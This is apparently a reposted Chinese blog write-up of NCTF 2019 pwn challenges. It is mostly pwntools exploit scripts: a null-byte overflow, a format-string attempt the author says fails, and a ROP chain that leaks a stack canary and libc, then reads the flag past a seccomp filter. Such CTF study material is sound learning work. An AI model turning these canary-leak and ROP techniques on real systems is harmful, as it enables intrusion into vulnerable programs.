Nctf2019 pwn

程序员文章站 2024-03-14 13:16:22

...

没啥好说的自己菜
就做了三个

hello_pwn

没啥好说了直接连

from pwn import *
local=1
p=remote('139.129.76.65',50003)
p.interactive()

pwn me 100 years! (Ⅰ)

00截断然后直接覆盖

from pwn import *
p=remote('139.129.76.65',50004)
#p=process('./pwn_me_1')
payload='yes'.ljust(0x10,'\x00')
payload+='ffff'
p.sendline(payload)
p.interactive()

pwn me 100 years! (Ⅱ)

这道题我啥我写入不了还是姿势不对啊大师傅们教教我

from pwn import *
p=process('./pwn_me_2')
elf=ELF('./pwn_me_2')
offset=6
p.recvuntil('name:')
p.send('%p'*24)
base=int(p.recvuntil('d30')[-14:],16)-0xd30
flag_addr=base+0x2020E0
log.success('base: '+hex(base))
log.success('flag_addr: '+hex(flag_addr))
p.recvuntil('want?')
payload='111111'+'%'+str(0x3333332D)+'c'+'%'+str(0x33333333)+'c%10$n'+p64(flag_addr)
p.send(payload)
p.interactive()
print payload

pwn me 100 years! (Ⅲ)

收集wp中自己太菜…

warmup

开了沙箱过滤了execve直接读呗…

from pwn import *
from LibcSearcher import *
local=0
if local==1:
	p=process('./warm_up')
	elf=ELF('./warm_up')
	libc=ELF('./libc6_2.23-0ubuntu10_amd64.so')
else:
	p=remote('139.129.76.65',50007)
	elf=ELF('./warm_up')
	libc=ELF('./libc-2.23.so')
pop_rdi=0x000400bc3
pop_rsi_r15=0x000400bc1
flag_addr=0x6010b0
def su(address):
	log.success('address :'+hex(address))
def exp():
	p.recvuntil('!!!')
	p.sendline(0x18*'a')
	p.recvuntil('aaaaa\n')
	canary=u64(p.recv(7).rjust(8,'\x00'))
	log.success('canary: '+hex(canary))
	pd='a'*0x18+p64(canary)+p64(0)+p64(pop_rdi)+p64(elf.got['puts'])+p64(elf.plt['puts'])+p64(0x00400AB6)
	p.recvuntil(' ?')
	p.sendline(pd)
	put_addr=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
	log.success('put_addr: '+hex(put_addr))
	libcbase=put_addr-libc.symbols['puts']
	open_addr=libcbase+0x0F7049
	log.success('open_addr: '+hex(open_addr))
	write_addr=libcbase+0x00F72B0
	read_addr=libcbase+0x0F7250
	pop_rdx=libcbase+0x00001b92
	pop_rsi=libcbase+0x0202e8
	p.recvuntil('!!!')
	p.sendline('binbin')
	payload='a'*0x18+p64(canary)+p64(0)+p64(pop_rdi)+p64(0)+p64(pop_rsi_r15)+p64(flag_addr)+p64(0x8)+p64(elf.symbols['read'])
	payload+=p64(pop_rdi)+p64(flag_addr)+p64(pop_rsi)+p64(0)+p64(open_addr)+p64(pop_rdi)+p64(3)
	payload+=p64(pop_rsi)+p64(flag_addr)+p64(pop_rdx)+p64(0x100)+p64(read_addr)+p64(pop_rdi)+p64(1)+p64(pop_rsi)+p64(flag_addr)
	payload+=p64(pop_rdx)+p64(0x100)+p64(write_addr)
	p.recvuntil(' ?')
	p.send(payload)
	sleep(1)
	p.send('flag')
	p.send('\n')
	p.interactive()
if __name__=="__main__":
	exp()

后面的easy_rop,easy_heap没看了

Nctf2019 pwn

hello_pwn

pwn me 100 years! (Ⅰ)

pwn me 100 years! (Ⅱ)

pwn me 100 years! (Ⅲ)

warmup

18.9.16 PWN2----Stack Overflow

[BUUCTF]PWN21——ciscn_2019_s_3

pwn学习系列--任务4 pwn200

PWN练习栈溢出

[BUUCTF]PWN——ciscn_2019_es_2

hello_pwn [XCTF-PWN]CTF writeup系列4

Pwn

pwn学习-canary

CTF中的PWN——绕canary防护3（选择项+puts带出canary+泄露函数地址计算基地址）

【PWN系列】攻防世界 supermarket 题解

Nctf2019 pwn

hello_pwn

pwn me 100 years! (Ⅰ)

pwn me 100 years! (Ⅱ)

pwn me 100 years! (Ⅲ)

warmup

18.9.16 PWN2----Stack Overflow

[BUUCTF]PWN21——ciscn_2019_s_3

pwn学习系列--任务4 pwn200

PWN练习 栈溢出

[BUUCTF]PWN——ciscn_2019_es_2

hello_pwn [XCTF-PWN]CTF writeup系列4

Pwn

pwn学习-canary

CTF中的PWN——绕canary防护3（选择项+puts带出canary+泄露函数地址计算基地址）

【PWN系列】攻防世界 supermarket 题解

PWN练习栈溢出